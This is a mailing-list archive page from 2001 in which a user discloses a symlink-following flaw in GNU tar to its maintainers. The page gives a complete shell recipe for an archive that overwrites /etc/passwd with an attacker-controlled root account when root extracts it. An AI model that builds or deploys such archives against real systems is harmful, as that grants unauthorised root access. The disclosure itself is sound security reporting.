Security bug: tar allows to overwrite arbitrary file when extracting

bug-gnu-utils

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Security bug: tar allows to overwrite arbitrary file when extracting

From:	Mikulas Patocka
Subject:	Security bug: tar allows to overwrite arbitrary file when extracting
Date:	Mon, 25 Jun 2001 18:11:36 +0200 (CEST)

Hi

Create tar archive xploit.tar this way:

rm -rf dir
mkdir dir
ln -s /etc/ dir/link
tar cf xploit.tar dir
rm -rf dir
mkdir dir
mkdir dir/link
echo 'r00t:0wn3d:0:0:1337 h4x0r:/:/bin/sh'>dir/link/passwd
tar rf xploit.tar dir
rm -rf dir

Now backup /etc/passwd and extract the archive under root account. No
matter where you are extracting it, extraction will overwite file
/etc/passwd. Tested on linux-2.2.16 and tar-1.13.19. 

Is this security bug? Or is it intended behaviour?

Mikulas

[Prev in Thread]

Current Thread

[Next in Thread]

Security bug: tar allows to overwrite arbitrary file when extracting, Mikulas Patocka <=
- Re: Security bug: tar allows to overwrite arbitrary file when extracting, Paul Eggert, 2001/06/27
  - Re: Security bug: tar allows to overwrite arbitrary file when extracting, Mikulas Patocka, 2001/06/28
    - Re: Security bug: tar allows to overwrite arbitrary file when extracting, Paul Eggert, 2001/06/29
    - Re: Security bug: tar allows to overwrite arbitrary file when extracting, Eli Zaretskii, 2001/06/30
    - Re: Security bug: tar allows to overwrite arbitrary file when extracting, Paul Eggert, 2001/06/30
    - Re: Security bug: tar allows to overwrite arbitrary file when extracting, Eli Zaretskii, 2001/06/30
    - Re: Security bug: tar allows to overwrite arbitrary file when extracting, Mikulas Patocka, 2001/06/30

Prev by Date: Re: tar and ssh
Next by Date: Re: gperf bug
Previous by thread: tar directory traversal
Next by thread: Re: Security bug: tar allows to overwrite arbitrary file when extracting
Index(es):
- Date
- Thread